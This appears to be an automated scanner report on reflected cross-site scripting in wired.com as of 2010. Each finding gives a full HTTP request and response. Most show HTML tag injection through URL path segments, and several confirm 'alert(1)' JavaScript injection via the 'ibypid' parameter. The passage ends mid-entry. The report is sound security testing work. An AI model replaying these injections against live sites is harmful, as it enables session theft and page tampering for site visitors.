GET /gadgets5c6cc"><a>2ec7c30f53a/mods HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29344 Vary: Accept-Encoding Cache-Control: max-age=231 Expires: Sun, 21 Nov 2010 23:12:08 GMT Date: Sun, 21 Nov 2010 23:08:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets5c6cc"><a>2ec7c30f53a ss_mods"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edc27"><a>e4a182d7a54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/modsedc27"><a>e4a182d7a54 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29344 Vary: Accept-Encoding Cache-Control: max-age=595 Expires: Sun, 21 Nov 2010 23:18:45 GMT Date: Sun, 21 Nov 2010 23:08:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_modsedc27"><a>e4a182d7a54"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29290"><a>3e97c83f0a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets29290"><a>3e97c83f0a7/pcs HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29342 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:18 GMT Date: Sun, 21 Nov 2010 23:08:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets29290"><a>3e97c83f0a7 ss_pcs"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea349"><a>abc8fc5b833 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/pcsea349"><a>abc8fc5b833 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29342 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:47 GMT Date: Sun, 21 Nov 2010 23:08:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_pcsea349"><a>abc8fc5b833"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139b1"><a>6824c99afe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets139b1"><a>6824c99afe8/portablemusic HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Sun, 21 Nov 2010 23:12:16 GMT Date: Sun, 21 Nov 2010 23:08:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets139b1"><a>6824c99afe8 ss_portablemusic"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9890b"><a>1a2bf9e403d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/portablemusic9890b"><a>1a2bf9e403d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:52 GMT Date: Sun, 21 Nov 2010 23:08:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_portablemusic9890b"><a>1a2bf9e403d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45461"><a>16a5e5e1666 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets45461"><a>16a5e5e1666/wireless HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:23 GMT Date: Sun, 21 Nov 2010 23:08:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets45461"><a>16a5e5e1666 ss_wireless"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd750"><a>8d8676eb6a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gadgets/wirelessbd750"><a>8d8676eb6a9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=597 Expires: Sun, 21 Nov 2010 23:18:52 GMT Date: Sun, 21 Nov 2010 23:08:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_wirelessbd750"><a>8d8676eb6a9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4899"><a>1ca469d09ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaminga4899"><a>1ca469d09ed HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29382 Vary: Accept-Encoding Cache-Control: max-age=222 Expires: Mon, 22 Nov 2010 01:15:04 GMT Date: Mon, 22 Nov 2010 01:11:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaminga4899"><a>1ca469d09ed"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b691"><a>f527151e420 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming3b691"><a>f527151e420/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29383 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 20:18:56 GMT Date: Sun, 21 Nov 2010 20:14:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming3b691"><a>f527151e420"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e36d"><a>49ae0050530 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming5e36d"><a>49ae0050530/gamingreviews HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29413 Vary: Accept-Encoding Cache-Control: max-age=232 Expires: Sun, 21 Nov 2010 23:12:30 GMT Date: Sun, 21 Nov 2010 23:08:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming5e36d"><a>49ae0050530 ss_gamingreviews"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de64"><a>eaff00508ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming/gamingreviews1de64"><a>eaff00508ec HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29413 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:07 GMT Date: Sun, 21 Nov 2010 23:09:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming ss_gamingreviews1de64"><a>eaff00508ec"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e9a"><a>5d92c74d73d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gamingc5e9a"><a>5d92c74d73d/hardware HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29403 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:26 GMT Date: Sun, 21 Nov 2010 23:08:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gamingc5e9a"><a>5d92c74d73d ss_hardware"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 511f3"><a>a929ebce08d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming/hardware511f3"><a>a929ebce08d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29403 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:03 GMT Date: Sun, 21 Nov 2010 23:09:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming ss_hardware511f3"><a>a929ebce08d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdcfc"><a>0a261e4d294 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gamingbdcfc"><a>0a261e4d294/virtualworlds HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29413 Vary: Accept-Encoding Cache-Control: max-age=226 Expires: Sun, 21 Nov 2010 23:12:23 GMT Date: Sun, 21 Nov 2010 23:08:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gamingbdcfc"><a>0a261e4d294 ss_virtualworlds"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bbd"><a>49da4046a0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming/virtualworlds97bbd"><a>49da4046a0e HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29413 Vary: Accept-Encoding Cache-Control: max-age=575 Expires: Sun, 21 Nov 2010 23:18:45 GMT Date: Sun, 21 Nov 2010 23:09:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming ss_virtualworlds97bbd"><a>49da4046a0e"> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 96627%3balert(1)//343adadbdb2 was submitted in the ibypid parameter. This input was echoed as 96627;alert(1)//343adadbdb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/electric-car-grid/?ibypid=596627%3balert(1)//343adadbdb2 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:33 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=445 Expires: Sun, 21 Nov 2010 23:21:58 GMT Date: Sun, 21 Nov 2010 23:14:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 101588
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 596627;alert(1)//343adadbdb2;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31876%3balert(1)//b8b3883cd7f was submitted in the ibypid parameter. This input was echoed as 31876;alert(1)//b8b3883cd7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/events-calendar?ibypid=231876%3balert(1)//b8b3883cd7f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:13 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:13 GMT Date: Sun, 21 Nov 2010 23:14:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 101948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 231876;alert(1)//b8b3883cd7f;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 53f8c%3balert(1)//63f97596e7a was submitted in the ibypid parameter. This input was echoed as 53f8c;alert(1)//63f97596e7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
